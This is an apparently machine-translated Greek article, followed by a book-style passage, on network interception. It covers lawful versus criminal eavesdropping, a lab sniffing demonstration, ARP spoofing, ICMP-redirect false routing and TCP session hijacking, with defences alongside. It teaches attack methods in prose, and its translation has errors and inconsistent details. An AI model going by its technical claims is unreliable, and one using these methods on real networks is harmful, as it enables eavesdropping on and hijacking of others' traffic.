Ο sniffer είναι ένα πρόγραμμα ή μια τεχνολογία υπολογιστή που παρεμποδίζει και αναλύει την κίνηση που διέρχεται από ένα δίκτυο. Το sniffer σάς επιτρέπει να συνδεθείτε σε μια περίοδο σύνδεσης ιστού και να εκτελέσετε διάφορες λειτουργίες για λογαριασμό του κατόχου του υπολογιστή.

Εάν οι πληροφορίες δεν μεταδίδονται σε πραγματικό χρόνο, spywareδημιουργία αναφορών που διευκολύνουν την προβολή και την ανάλυση πληροφοριών.

Η παρακολούθηση δικτύου μπορεί να πραγματοποιηθεί νόμιμα ή παράνομα. Το κύριο έγγραφο που καθορίζει τη νομιμότητα της απόκτησης πληροφοριών είναι η Σύμβαση για το έγκλημα στον κυβερνοχώρο. Δημιουργήθηκε στην Ουγγαρία το 2001. Οι νομικές απαιτήσεις μπορεί να διαφέρουν ελαφρώς από πολιτεία σε πολιτεία, αλλά το βασικό μήνυμα είναι το ίδιο για όλες τις χώρες.

Ταξινόμηση και μέθοδοι υποκλοπής δεδομένων μέσω του δικτύου

Σύμφωνα με τα παραπάνω, η υποκλοπή πληροφοριών μέσω ενός δικτύου μπορεί να χωριστεί σε δύο τύπους: εξουσιοδοτημένη και μη εξουσιοδοτημένη.

Η εξουσιοδοτημένη συλλογή δεδομένων πραγματοποιείται για διάφορους σκοπούς, που κυμαίνονται από την προστασία εταιρικών πληροφοριών έως τη διασφάλιση της εθνικής ασφάλειας. Οι λόγοι για την εκτέλεση μιας τέτοιας επέμβασης καθορίζονται από τη νομοθεσία, τις ειδικές υπηρεσίες, τους αξιωματούχους επιβολής του νόμου και τους ειδικούς διοικητικές οργανώσειςκαι τις υπηρεσίες ασφαλείας της εταιρείας.

Υπάρχουν διεθνή πρότυπα για την παρακολούθηση δεδομένων. Το Ευρωπαϊκό Ινστιτούτο Τηλεπικοινωνιακών Προτύπων κατάφερε να εναρμονίσει ορισμένες τεχνικές διαδικασίες (ETSI ES 201 158 «Telecommunications Security; Lawful Interception (LI); Requirements for network functions») στις οποίες βασίζεται η υποκλοπή πληροφοριών. Ως αποτέλεσμα, αναπτύχθηκε μια αρχιτεκτονική συστήματος που βοηθά τους ειδικούς των μυστικών υπηρεσιών και τους διαχειριστές δικτύων να λαμβάνουν νόμιμα δεδομένα από το δίκτυο. Η αναπτυγμένη δομή για την υλοποίηση της υποκλοπής δεδομένων μέσω του δικτύου χρησιμοποιείται για ενσύρματα και ασύρματα συστήματαφωνητικές κλήσεις, καθώς και αλληλογραφία μέσω ταχυδρομείου, μετάδοση φωνητικών μηνυμάτων μέσω IP, ανταλλαγή πληροφοριών μέσω SMS.

Η μη εξουσιοδοτημένη υποκλοπή δεδομένων μέσω δικτύου πραγματοποιείται από εισβολείς που θέλουν να αποκτήσουν στην κατοχή τους εμπιστευτικά δεδομένα, κωδικούς πρόσβασης, εταιρικά μυστικά, διευθύνσεις μηχανών υπολογιστών στο δίκτυο κ.λπ. Για να επιτύχουν τους στόχους τους, οι χάκερ χρησιμοποιούν συνήθως έναν αναλυτή κίνησης δικτύου - έναν ανιχνευτή. Αυτό το πρόγραμμαή μια συσκευή υλικού-λογισμικού δίνει στον απατεώνα τη δυνατότητα να υποκλέψει και να αναλύσει πληροφορίες εντός του δικτύου στο οποίο είναι συνδεδεμένος ο χρήστης-θύμα, συμπεριλαμβανομένης της κρυπτογραφημένης κίνησης SSL μέσω πλαστογράφησης πιστοποιητικών. Τα δεδομένα κυκλοφορίας μπορούν να ληφθούν με διάφορους τρόπους:

ακούγοντας τη διεπαφή δικτύου,
σύνδεση μιας συσκευής παρακολούθησης σε μια διακοπή καναλιού,
δημιουργία ενός κλάδου κυκλοφορίας και αντιγραφή του στον ανιχνευτή,
πραγματοποιώντας επίθεση.

Υπάρχουν επίσης πιο σύνθετες τεχνολογίες για την υποκλοπή σημαντικών πληροφοριών που επιτρέπουν σε κάποιον να εισβάλει στις αλληλεπιδράσεις του δικτύου και να αλλάξει δεδομένα. Μια τέτοια τεχνική είναι τα πλαστά αιτήματα ARP. Η ουσία της μεθόδου είναι η αντικατάσταση διευθύνσεων IP μεταξύ του υπολογιστή του θύματος και της συσκευής του εισβολέα. Μια άλλη μέθοδος που μπορεί να χρησιμοποιηθεί για την υποκλοπή δεδομένων μέσω ενός δικτύου είναι η ψευδής δρομολόγηση. Περιλαμβάνει την αντικατάσταση της διεύθυνσης IP ενός δρομολογητή δικτύου με τη δική σας διεύθυνση. Εάν ένας εγκληματίας του κυβερνοχώρου γνωρίζει πώς είναι οργανωμένο το τοπικό δίκτυο στο οποίο βρίσκεται το θύμα, τότε μπορεί εύκολα να οργανώσει τη λήψη πληροφοριών από το μηχάνημα του χρήστη στη διεύθυνση IP του. Η λήψη μιας σύνδεσης TCP εξυπηρετεί επίσης με αποτελεσματικό τρόπουποκλοπή δεδομένων. Ο εισβολέας διακόπτει τη συνεδρία επικοινωνίας δημιουργώντας και στέλνοντας πακέτα TCP στον υπολογιστή του θύματος. Στη συνέχεια, η συνεδρία επικοινωνίας αποκαθίσταται, υποκλαπεί και συνεχίζεται από τον εγκληματία αντί από τον πελάτη.

Αντικείμενο επιρροής

Αντικείμενα υποκλοπής δεδομένων μέσω του δικτύου μπορεί να είναι κυβερνητικές υπηρεσίες, βιομηχανικές επιχειρήσεις, εμπορικές δομές και απλοί χρήστες. Μέσα σε έναν οργανισμό ή επιχείρηση, οι πληροφορίες μπορούν να συλληφθούν για την προστασία της υποδομής του δικτύου. Οι υπηρεσίες πληροφοριών και οι υπηρεσίες επιβολής του νόμου μπορούν να πραγματοποιούν μαζικές υποκλοπές πληροφοριών που μεταδίδονται από διαφορετικούς ιδιοκτήτες, ανάλογα με το έργο που εκτελούν.

Αν μιλάμε για εγκληματίες του κυβερνοχώρου, τότε οποιοσδήποτε χρήστης ή οργανισμός μπορεί να γίνει αντικείμενο επιρροής προκειμένου να αποκτήσει δεδομένα που μεταδίδονται μέσω του δικτύου. Με την εξουσιοδοτημένη πρόσβαση, το ενημερωτικό μέρος των πληροφοριών που λαμβάνονται είναι σημαντικό, ενώ ένας εισβολέας ενδιαφέρεται περισσότερο για δεδομένα που μπορούν να χρησιμοποιηθούν για την κατάσχεση μετρητάή πολύτιμες πληροφορίες για την επακόλουθη πώλησή του.

Τις περισσότερες φορές, οι χρήστες που συνδέονται σε ένα δημόσιο δίκτυο, για παράδειγμα σε ένα καφέ με hotspot, γίνονται θύματα υποκλοπής πληροφοριών από εγκληματίες του κυβερνοχώρου. Πρόσβαση Wi-Fi. Ένας εισβολέας συνδέεται σε μια περίοδο σύνδεσης ιστού χρησιμοποιώντας ένα sniffer, αντικαθιστά δεδομένα και κλέβει προσωπικές πληροφορίες. Διαβάστε περισσότερα για το πώς συμβαίνει αυτό στο άρθρο.

Πηγή απειλής

Η εξουσιοδοτημένη υποκλοπή πληροφοριών σε εταιρείες και οργανισμούς πραγματοποιείται από φορείς εκμετάλλευσης υποδομών δημοσίων δικτύων. Οι δραστηριότητές τους στοχεύουν στην προστασία προσωπικών δεδομένων, εμπορικών μυστικών και άλλων σημαντικές πληροφορίες. Νομικά, η μεταφορά μηνυμάτων και αρχείων μπορεί να παρακολουθείται από υπηρεσίες πληροφοριών, υπηρεσίες επιβολής του νόμου και διάφορες κρατικές υπηρεσίες για να διασφαλιστεί η ασφάλεια των πολιτών και του κράτους.

Οι εγκληματίες εμπλέκονται σε παράνομες υποκλοπές δεδομένων. Για να αποφύγετε να γίνετε θύμα ενός εγκληματία στον κυβερνοχώρο, πρέπει να ακολουθήσετε ορισμένες συστάσεις από ειδικούς. Για παράδειγμα, δεν πρέπει να εκτελείτε λειτουργίες που απαιτούν εξουσιοδότηση και μεταφορά ευαίσθητων δεδομένων σε μέρη όπου η σύνδεση είναι σε δημόσια δίκτυα. Είναι ασφαλέστερο να επιλέξετε δίκτυα με κρυπτογράφηση και ακόμα καλύτερα - να χρησιμοποιείτε προσωπικά μόντεμ 3G και LTE. Κατά τη μεταφορά προσωπικών δεδομένων, συνιστάται η κρυπτογράφηση τους χρησιμοποιώντας το πρωτόκολλο HTTPS ή μια προσωπική σήραγγα VPN.

Μπορείτε να προστατεύσετε τον υπολογιστή σας από την υποκλοπή της κυκλοφορίας του δικτύου χρησιμοποιώντας κρυπτογραφία και anti-sniffer. Η πρόσβαση μέσω τηλεφώνου και όχι ασύρματου δικτύου θα μειώσει τους κινδύνους.

Αυτό το μάθημα περιγράφει τεχνολογίες παραβίασης δικτύου που βασίζονται στην υποκλοπή πακέτων δικτύου. Οι χάκερ χρησιμοποιούν τέτοιες τεχνολογίες για να ακούν την κίνηση του δικτύου προκειμένου να κλέψουν πολύτιμες πληροφορίες, να οργανώσουν την υποκλοπή δεδομένων με σκοπό την επίθεση man-in-the-middle, να υποκλέψουν συνδέσεις TCP, να επιτρέψουν, ας πούμε, πλαστογράφηση δεδομένων και να εκτελέσουν άλλες εξίσου ενδιαφέρουσες ενέργειες. Δυστυχώς, οι περισσότερες από αυτές τις επιθέσεις υλοποιούνται στην πραγματικότητα μόνο για δίκτυα Unix, για τα οποία οι χάκερ μπορούν να χρησιμοποιήσουν και τα δύο ειδικές βοηθητικές υπηρεσίες, και εργαλεία συστήματος Unix. Τα δίκτυα των Windows, προφανώς, έχουν αγνοηθεί από τους χάκερ και είμαστε αναγκασμένοι να περιορίσουμε την περιγραφή των εργαλείων υποκλοπής δεδομένων στα προγράμματα ανίχνευσης που έχουν σχεδιαστεί για ασήμαντη ακρόαση πακέτων δικτύου. Ωστόσο, δεν πρέπει να παραμεληθεί κανείς τουλάχιστον μια θεωρητική περιγραφή τέτοιων επιθέσεων, ειδικά για anti-hackers, καθώς η γνώση των τεχνολογιών hacking που χρησιμοποιούνται θα βοηθήσει στην αποφυγή πολλών προβλημάτων.

Δίκτυο sniffing

Συνήθως χρησιμοποιείται για την ανίχνευση δικτύων Ethernet. κάρτες δικτύουμετάβαση σε λειτουργία ακρόασης. Ακούγοντας Δίκτυα Ethernetαπαιτεί τη σύνδεση ενός υπολογιστή που εκτελεί ένα πρόγραμμα sniffer σε ένα τμήμα δικτύου, μετά το οποίο όλη η κίνηση δικτύου που αποστέλλεται και λαμβάνεται από υπολογιστές σε αυτό το τμήμα δικτύου γίνεται διαθέσιμη στον χάκερ. Είναι ακόμη πιο εύκολο να παρακολουθείτε την κυκλοφορία από δίκτυα ραδιοφώνου που χρησιμοποιούν ενδιάμεσους ασύρματου δικτύου - σε αυτήν την περίπτωση, δεν χρειάζεται καν να αναζητήσετε μέρος για να συνδεθείτε στο καλώδιο. Ή ένας εισβολέας μπορεί να συνδεθεί στην τηλεφωνική γραμμή που συνδέει τον υπολογιστή με τον διακομιστή Διαδικτύου, βρίσκοντας ένα βολικό μέρος για αυτό (οι τηλεφωνικές γραμμές συνήθως τοποθετούνται σε υπόγεια και άλλα μέρη που σπάνια επισκέπτονται χωρίς καμία προστασία).

Για να επιδείξουμε την τεχνολογία sniffing, θα χρησιμοποιήσουμε το πολύ δημοφιλές πρόγραμμα sniffer SpyNet, το οποίο βρίσκεται σε πολλές τοποθεσίες Web. Ο επίσημος ιστότοπος του προγράμματος SpyNet βρίσκεται στη διεύθυνση http://members.xoom.com/layrentiu2/, όπου μπορείτε να κατεβάσετε μια δοκιμαστική έκδοση του προγράμματος.

Το πρόγραμμα SpyNet αποτελείται από δύο στοιχεία - το CaptureNet και το PipeNet. Το πρόγραμμα CaptureNet σάς επιτρέπει να παρακολουθείτε πακέτα που μεταδίδονται μέσω δικτύου Ethernet σε επίπεδο δικτύου, π.χ. με τη μορφή πλαισίων Ethernet. Το λογισμικό PipeNet σάς επιτρέπει να συναρμολογείτε πλαίσια Ethernet σε πακέτα επιπέδου εφαρμογής, επαναφέροντας, για παράδειγμα, μηνύματα ΗΛΕΚΤΡΟΝΙΚΗ ΔΙΕΥΘΥΝΣΗ, μηνύματα πρωτοκόλλου HTTP (ανταλλαγή πληροφοριών με τον διακομιστή Web) και εκτελούν άλλες λειτουργίες.

Δυστυχώς, στην επίδειξη του SpyNet, οι δυνατότητες του PipeNet περιορίζονται στην επίδειξη συναρμολόγησης πακέτων HTTP, επομένως δεν θα μπορούμε να επιδείξουμε πλήρως το SpyNet. Ωστόσο, θα δείξουμε τις δυνατότητες sniffing δικτύου του SpyNet χρησιμοποιώντας το πειραματικό μας δίκτυο ως παράδειγμα περνώντας αρχείο κειμένουαπό τον κεντρικό υπολογιστή Sword-2000 στον κεντρικό υπολογιστή Alex-Z χρησιμοποιώντας το συνηθισμένο Εξερεύνηση των Windows. Ταυτόχρονα, στον υπολογιστή A1ex-1 θα εκκινήσουμε το πρόγραμμα CaptureNet, το οποίο θα υποκλέψει τα μεταδιδόμενα πακέτα και θα μας επιτρέπει να διαβάζουμε τα περιεχόμενα του μεταδιδόμενου αρχείου σε πλαίσια Ethernet. Στο Σχ. 1 δείχνει το κείμενο του μυστικού μηνύματος στο αρχείο secret.txt. θα προσπαθήσουμε να βρούμε αυτό το κείμενο στα αποτυπωμένα πλαίσια Ethernet.

Ρύζι. 1. Κείμενο του μυστικού μηνύματος στο παράθυρο Σημειωματάριο

Για να καταγράψετε πλαίσια Ethernet, ακολουθήστε τα εξής βήματα:

Στον υπολογιστή Alex-Z, εκτελέστε το πρόγραμμα CaptureNet. Στο εμφανιζόμενο παράθυρο εργασίας του προγράμματος, επιλέξτε την εντολή μενού Capture * Start (Capture * Start) και ξεκινήστε τη διαδικασία υποκλοπής πλαισίων δικτύου.

Χρησιμοποιώντας την Εξερεύνηση των Windows, αντιγράψτε το αρχείο security.txt από τον υπολογιστή Sword-2000 στο A1ex-3.

Αφού μεταφέρετε το αρχείο secret.txt, επιλέξτε την εντολή μενού Capture * Stop και σταματήστε τη διαδικασία λήψης.

Τα καταγεγραμμένα πλαίσια Ethernet θα εμφανιστούν στη δεξιά πλευρά του παραθύρου του προγράμματος CaptureNet (Εικόνα 2), με κάθε σειρά στην επάνω λίστα να αντιπροσωπεύει ένα πλαίσιο Ethernet και κάτω από τη λίστα τα περιεχόμενα του επιλεγμένου πλαισίου.

Ρύζι. 2. Το πλαίσιο Ethernet περιέχει κείμενο μυστικού μηνύματος

Έχοντας κοιτάξει τη λίστα των υποκλαπόμενων καρέ, μπορούμε εύκολα να βρούμε αυτό που περιέχει το κείμενο που μεταδώσαμε Αυτό είναι ένα πολύ μεγάλο μυστικό (Αυτό είναι ένα πολύ μεγάλο μυστικό).

Τονίζουμε ότι αυτό είναι το απλούστερο παράδειγμα, όταν καταγράφηκε όλη η υποκλαπόμενη κίνηση δικτύου. Το CaptureNet σάς επιτρέπει να παρεμποδίζετε πακέτα που αποστέλλονται μέσω συγκεκριμένων πρωτοκόλλων και σε συγκεκριμένες θύρες κεντρικού υπολογιστή, να επιλέγετε μηνύματα με συγκεκριμένο περιεχόμενο και να συγκεντρώνετε τα δεδομένα που καταγράφονται σε ένα αρχείο. Η τεχνική για την εκτέλεση τέτοιων ενεργειών είναι απλή και μπορείτε να τη μάθετε χρησιμοποιώντας το σύστημα βοήθειας του προγράμματος SpyNet.

Εκτός από την πρωτόγονη υποκλοπή δικτύου, οι χάκερ έχουν πρόσβαση σε πιο εξελιγμένα μέσα υποκλοπής δεδομένων. Ακολουθεί μια σύντομη επισκόπηση τέτοιων μεθόδων, αν και από θεωρητική άποψη. Ο λόγος είναι ότι για τα δίκτυα των Windows, η πρακτική εφαρμογή των επιθέσεων υποκλοπής δεδομένων είναι εξαιρετικά περιορισμένη και το σύνολο αξιόπιστων βοηθητικών προγραμμάτων για επιθέσεις υποκλοπής είναι αρκετά φτωχό.

Μέθοδοι υποκλοπής κίνησης δικτύου

Το sniffing δικτύου χρησιμοποιώντας προγράμματα αναλυτών δικτύου όπως το CaptureNet παραπάνω είναι ο πρώτος, απλούστερος τρόπος για να υποκλαπούν δεδομένα. Εκτός από το SpyNet, χρησιμοποιούνται πολλά εργαλεία για την ανίχνευση δικτύου, τα οποία αρχικά αναπτύχθηκαν για σκοπούς ανάλυσης της δραστηριότητας δικτύου, διάγνωσης δικτύων, επιλογής κίνησης σύμφωνα με καθορισμένα κριτήρια και άλλων εργασιών διαχείρισης δικτύου. Ένα παράδειγμα τέτοιου προγράμματος είναι το tcpdump (http://www.tcpdump.org), το οποίο σας επιτρέπει να καταγράφετε την κυκλοφορία δικτύου σε ένα ειδικό αρχείο καταγραφής για μεταγενέστερη ανάλυση.

Για την προστασία από την υποκλοπή δικτύου, χρησιμοποιούνται ειδικά προγράμματα, για παράδειγμα, το AntiSniff (http://www.securitysoftwaretech.com/antisniff), τα οποία είναι σε θέση να αναγνωρίζουν υπολογιστές στο δίκτυο που ακούν την κυκλοφορία δικτύου. Για να λύσουν τα προβλήματά τους, τα προγράμματα antisniffer χρησιμοποιούν ένα ειδικό σημάδι της παρουσίας συσκευών ακρόασης στο δίκτυο - η κάρτα δικτύου του υπολογιστή sniffer πρέπει να βρίσκεται σε ειδική λειτουργία ακρόασης. Κατά τη λειτουργία ακρόασης, οι υπολογιστές δικτύου αντιδρούν με ειδικό τρόπο στα γραφήματα δεδομένων IP που αποστέλλονται στον υπό δοκιμή κεντρικό υπολογιστή. Για παράδειγμα, οι κεντρικοί υπολογιστές ακρόασης επεξεργάζονται συνήθως όλη την εισερχόμενη κίνηση, όχι μόνο τα γραφήματα δεδομένων που αποστέλλονται στη διεύθυνση του κεντρικού υπολογιστή. Υπάρχουν άλλα σημάδια που υποδεικνύουν ύποπτη συμπεριφορά κεντρικού υπολογιστή που μπορεί να αναγνωρίσει το AntiSniff.

Ψεύτικα αιτήματα ARP

Για να υποκλέψει και να αναλάβει τη διαδικασία αλληλεπίδρασης δικτύου μεταξύ δύο κεντρικών υπολογιστών Α και Β, ένας εισβολέας μπορεί να αντικαταστήσει τις διευθύνσεις IP των κεντρικών υπολογιστών που αλληλεπιδρούν με τη δική του διεύθυνση IP στέλνοντας παραποιημένα μηνύματα ARP (Πρωτόκολλο Ανάλυσης Διεύθυνσης) στους κεντρικούς υπολογιστές Α και Β. Μπορείτε να εξοικειωθείτε με το πρωτόκολλο ARP στο Παράρτημα Δ, το οποίο περιγράφει τη διαδικασία για την επίλυση (μετατροπή) της διεύθυνσης IP του κεντρικού υπολογιστή στη διεύθυνση μηχανής (διεύθυνση MAC) που είναι κωδικοποιημένη στην κάρτα δικτύου του κεντρικού υπολογιστή. Ας δούμε πώς ένας χάκερ μπορεί να χρησιμοποιήσει το ARP για να υποκλέψει τις επικοινωνίες δικτύου μεταξύ των κεντρικών υπολογιστών Α και Β.

Ο εισβολέας καθορίζει τις διευθύνσεις MAC των κεντρικών υπολογιστών Α και Β, για παράδειγμα, χρησιμοποιώντας την εντολή nbtstat από το πακέτο W2RK.

Ο εισβολέας στέλνει μηνύματα στις αναγνωρισμένες διευθύνσεις MAC των κεντρικών υπολογιστών Α και Β, οι οποίες είναι παραποιημένες απαντήσεις ARP σε αιτήματα για την επίλυση των διευθύνσεων IP των κεντρικών υπολογιστών στις διευθύνσεις MAC των υπολογιστών. Ο κεντρικός υπολογιστής Α ενημερώνεται ότι η διεύθυνση IP του κεντρικού υπολογιστή Β αντιστοιχεί στη διεύθυνση MAC του υπολογιστή του εισβολέα. Ο κεντρικός υπολογιστής Β ενημερώνεται ότι η διεύθυνση IP του κεντρικού υπολογιστή Α αντιστοιχεί επίσης στη διεύθυνση MAC του υπολογιστή του εισβολέα.

Οι κεντρικοί υπολογιστές Α και Β αποθηκεύουν τις ληφθείσες διευθύνσεις MAC στις κρυφές μνήμες ARP και στη συνέχεια τις χρησιμοποιούν για να στείλουν μηνύματα ο ένας στον άλλο. Εφόσον οι διευθύνσεις IP Α και Β αντιστοιχούν στη διεύθυνση MAC του υπολογιστή του εισβολέα, οι κεντρικοί υπολογιστές Α και Β, χωρίς υποψία, επικοινωνούν μέσω ενός μεσάζοντα που μπορεί να κάνει οτιδήποτε με τα μηνύματά τους.

Για την προστασία από τέτοιες επιθέσεις, οι διαχειριστές δικτύου πρέπει να διατηρούν μια βάση δεδομένων με έναν πίνακα αντιστοιχίας μεταξύ των διευθύνσεων MAC και των διευθύνσεων IP των υπολογιστών δικτύου τους. Στη συνέχεια, χρησιμοποιώντας ένα ειδικό λογισμικόΓια παράδειγμα, τα βοηθητικά προγράμματα arpwatch (ftp://ftp.ee.lbl.gov/arpwatch-2.lab.tar.gz) μπορούν περιοδικά να ερευνούν το δίκτυο και να εντοπίζουν ασυνέπειες.

Σε δίκτυα UNIX, αυτός ο τύπος πλαστών επίθεσης αιτήματος ARP μπορεί να υλοποιηθεί χρησιμοποιώντας βοηθητικά προγράμματα συστήματος για την παρακολούθηση και τη διαχείριση της κυκλοφορίας του δικτύου, όπως το arpredirect. Δυστυχώς, τέτοια αξιόπιστα βοηθητικά προγράμματα δεν φαίνεται να εφαρμόζονται σε δίκτυα Windows 2000/XP. Για παράδειγμα, στον ιστότοπο του NTsecurity (http://www.ntsecurity.nu) μπορείτε να κάνετε λήψη του βοηθητικού προγράμματος GrabitAII, που παρουσιάζεται ως εργαλείο για την ανακατεύθυνση της κυκλοφορίας μεταξύ των κεντρικών υπολογιστών δικτύου. Ωστόσο, ένας βασικός έλεγχος της λειτουργικότητας του βοηθητικού προγράμματος GrabitAII δείχνει ότι η πλήρης επιτυχία στην υλοποίηση των λειτουργιών του είναι ακόμα μακριά.

Εσφαλμένη δρομολόγηση

Για να εκτελέσει ψευδή δρομολόγηση, ο εισβολέας πρέπει να γνωρίζει ορισμένες λεπτομέρειες σχετικά με την οργάνωση του τοπικού δικτύου στο οποίο βρίσκεται ο κεντρικός υπολογιστής Α, ιδίως τη διεύθυνση IP του δρομολογητή μέσω του οποίου αποστέλλεται η κίνηση από τον κεντρικό υπολογιστή Α στο Β. Γνωρίζοντας αυτό, ο εισβολέας θα δημιουργήσει ένα datagram IP στο οποίο η IP - η διεύθυνση αποστολέα ορίζεται ως η διεύθυνση IP του δρομολογητή και ο παραλήπτης είναι ο κεντρικός υπολογιστής A. Επίσης στο datagram περιλαμβάνεται ένα μήνυμα ανακατεύθυνσης ICMP με το πεδίο διεύθυνσης του νέου δρομολογητή ορισμένο στο Διεύθυνση IP του υπολογιστή του εισβολέα. Έχοντας λάβει ένα τέτοιο μήνυμα, ο κεντρικός υπολογιστής Α θα στείλει όλα τα μηνύματα στη διεύθυνση IP του υπολογιστή του εισβολέα.

Τα παραπάνω παραδείγματα υποκλοπών (στις οποίες οι δυνατότητες των εισβολέων δεν είναι καθόλου περιορισμένες) μας πείθουν για την ανάγκη προστασίας των δεδομένων που μεταδίδονται μέσω του δικτύου εάν τα δεδομένα περιέχουν εμπιστευτικές πληροφορίες. Η μόνη μέθοδος προστασίας από υποκλοπές κυκλοφορίας δικτύου είναι η χρήση προγραμμάτων που εφαρμόζουν κρυπτογραφικούς αλγόριθμους και πρωτόκολλα κρυπτογράφησης και αποτρέπουν την αποκάλυψη και την αντικατάσταση μυστικών πληροφοριών. Για την επίλυση τέτοιων προβλημάτων, η κρυπτογραφία παρέχει εργαλεία για την κρυπτογράφηση, την υπογραφή και την επαλήθευση της γνησιότητας των μηνυμάτων που μεταδίδονται μέσω ασφαλών πρωτοκόλλων

Η πρακτική εφαρμογή όλων των μεθόδων κρυπτογράφησης για την προστασία της ανταλλαγής πληροφοριών που περιγράφεται στο Κεφάλαιο 4 παρέχεται από δίκτυα VPN (Virtual Private Network). Μια σύντομη επισκόπηση των αρχών και τεχνικών κρυπτογραφικής ασφάλειας μπορείτε να βρείτε στο Παράρτημα Ε και Λεπτομερής περιγραφήεργαλεία κρυπτογραφικής προστασίας που παρέχονται από την εφαρμογή PGP Desktop Security (http://www.pgp.com).

Υποκλοπή σύνδεσης TCP

Έχουν δημιουργηθεί αρκετά αποτελεσματικά βοηθητικά προγράμματα για την εκτέλεση επιθέσεων πειρατείας σύνδεσης TCP, αλλά όλα υλοποιούνται για την πλατφόρμα Unix και σε τοποθεσίες Web αυτά τα βοηθητικά προγράμματα παρουσιάζονται μόνο σε μορφή πηγαίου κώδικα. Έτσι, ως πεπεισμένοι επαγγελματίες για την ευγενή αιτία του hacking, οι επιθέσεις που χρησιμοποιούν τη μέθοδο υποκλοπής σύνδεσης TCP δεν είναι πολύ χρήσιμες για εμάς. (Όσοι επιθυμούν να κατανοούν τον κώδικα προγράμματος άλλων ατόμων μπορούν να ανατρέξουν στον ιστότοπο http://www.cri.cz/~kra/index.html, όπου μπορείτε να κάνετε λήψη πηγήτο γνωστό βοηθητικό πρόγραμμα υποκλοπής σύνδεσης Hunt TCP από τον Pavel Krauz).

Παρά την έλλειψη πρακτικών εργαλείων, δεν μπορούμε να αγνοήσουμε ένα τόσο ενδιαφέρον θέμα όπως η υποκλοπή συνδέσεων TCP και θα σταθούμε σε ορισμένες πτυχές τέτοιων επιθέσεων. Μερικές πληροφορίες σχετικά με τη δομή ενός πακέτου TCP και τη διαδικασία δημιουργίας συνδέσεων TCP δίνονται στο Παράρτημα Δ αυτού του βιβλίου, αλλά εδώ θα επικεντρωθούμε στο ερώτημα - τι ακριβώς επιτρέπει στους χάκερ να πραγματοποιούν επιθέσεις υποκλοπής σύνδεσης TCP; Ας εξετάσουμε αυτό το θέμα με περισσότερες λεπτομέρειες, βασιζόμενοι κυρίως στη συζήτηση στο και.

Το πρωτόκολλο TCP (Transmission Control Protocol) είναι ένα από τα βασικά πρωτόκολλα επιπέδου μεταφοράς OSI που σας επιτρέπει να δημιουργείτε λογικές συνδέσεις μέσω ενός εικονικού καναλιού επικοινωνίας. Σε αυτό το κανάλι, τα πακέτα μεταδίδονται και λαμβάνονται με την αλληλουχία τους καταγεγραμμένη, η ροή των πακέτων ελέγχεται, οργανώνεται η αναμετάδοση παραμορφωμένων πακέτων και στο τέλος της συνεδρίας το κανάλι επικοινωνίας διακόπτεται. Το πρωτόκολλο TCP είναι το μόνο βασικό πρωτόκολλο στην οικογένεια TCP/IP που διαθέτει προηγμένο σύστημα αναγνώρισης μηνυμάτων και σύνδεσης.

Για τον προσδιορισμό ενός πακέτου TCP, υπάρχουν δύο αναγνωριστικά 32-bit στην κεφαλίδα TCP, τα οποία λειτουργούν επίσης ως μετρητές πακέτων, που ονομάζονται αριθμός ακολουθίας και αριθμός επιβεβαίωσης. Θα μας ενδιαφέρει επίσης ένα ακόμη πεδίο του πακέτου TCP, που ονομάζεται bits ελέγχου. Αυτό το πεδίο 6-bit περιλαμβάνει τα ακόλουθα bit ελέγχου (με σειρά από αριστερά προς τα δεξιά):

URG - σημαία επείγοντος.

ACK - σημαία επιβεβαίωσης.

PSH - σημαία μεταφοράς.

RST - σημαία αποκατάστασης σύνδεσης.

SYN - σημαία συγχρονισμού.

FIN - σημαία τερματισμού σύνδεσης.

Ας δούμε τη διαδικασία για τη δημιουργία μιας σύνδεσης TCP.

1. Εάν ο κεντρικός υπολογιστής Α χρειάζεται να δημιουργήσει μια σύνδεση TCP με τον κεντρικό υπολογιστή Β, τότε ο κεντρικός υπολογιστής Α στέλνει στον κεντρικό υπολογιστή Β το ακόλουθο μήνυμα:

Α -> Β: ΣΥΝ, ΙΣΣα

Αυτό σημαίνει ότι το μήνυμα που αποστέλλεται από τον κεντρικό υπολογιστή Α έχει οριστεί η σημαία SYN (Συγχρονισμός αριθμού ακολουθίας) και το πεδίο αριθμού ακολουθίας έχει οριστεί στην αρχική τιμή 32 bit ISSa (Initial Sequence Number).

2. Σε απόκριση στο αίτημα που ελήφθη από τον κεντρικό υπολογιστή Α, ο κεντρικός υπολογιστής Β απαντά με ένα μήνυμα στο οποίο έχει οριστεί το bit SYN και έχει οριστεί το bit ACK. Στο πεδίο αριθμού ακολουθίας, ο κεντρικός υπολογιστής Β ορίζει την αρχική του τιμή μετρητή - ISSb. το πεδίο αριθμού επιβεβαίωσης θα περιέχει τότε την τιμή ISSa που ελήφθη στο πρώτο πακέτο από τον κεντρικό υπολογιστή Α, αυξημένη κατά ένα. Έτσι ο οικοδεσπότης Β απαντά με αυτό το μήνυμα:

B -> A: SYN, ACK, ISSb, ACK(ISSa+1)

3. Τέλος, ο κεντρικός υπολογιστής Α στέλνει ένα μήνυμα στον κεντρικό υπολογιστή Β, στο οποίο: έχει οριστεί το bit ACK. το πεδίο αριθμού ακολουθίας περιέχει την τιμή ISSa + 1. Το πεδίο αριθμού επιβεβαίωσης περιέχει την τιμή ISSb + 1. Μετά από αυτό, η σύνδεση TCP μεταξύ των κεντρικών υπολογιστών Α και Β θεωρείται εδραιωμένη:

A -> B: ACK, ISSa+1, ACK(ISSb+1)

4. Τώρα ο κεντρικός υπολογιστής Α μπορεί να στείλει πακέτα δεδομένων στον κεντρικό υπολογιστή Β μέσω του νεοδημιουργημένου εικονικού καναλιού TCP:

A -> B: ACK, ISSa+1, ACK(ISSb+1); ΔΕΔΟΜΕΝΑ

Εδώ DATA σημαίνει δεδομένα.

